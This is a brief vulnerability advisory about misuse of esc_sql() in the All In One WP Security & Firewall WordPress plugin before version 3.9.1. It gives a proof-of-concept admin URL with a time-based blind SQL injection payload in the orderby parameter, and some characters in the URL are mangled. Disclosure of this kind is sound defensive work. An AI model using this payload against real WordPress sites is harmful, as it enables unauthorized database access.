There are some pages which use the WordPress esc_sql() function incorrectly.
http://www.example.com/wp-admin/admin.php?page=aiowpsec&tab;=tab3&orderby;=user_id,(select * from (select(sleep(30)))a)ℴ=asc
CPE | Name | Operator | Version |
---|---|---|---|
all-in-one-wp-security-and-firewall | lt | 3.9.1 |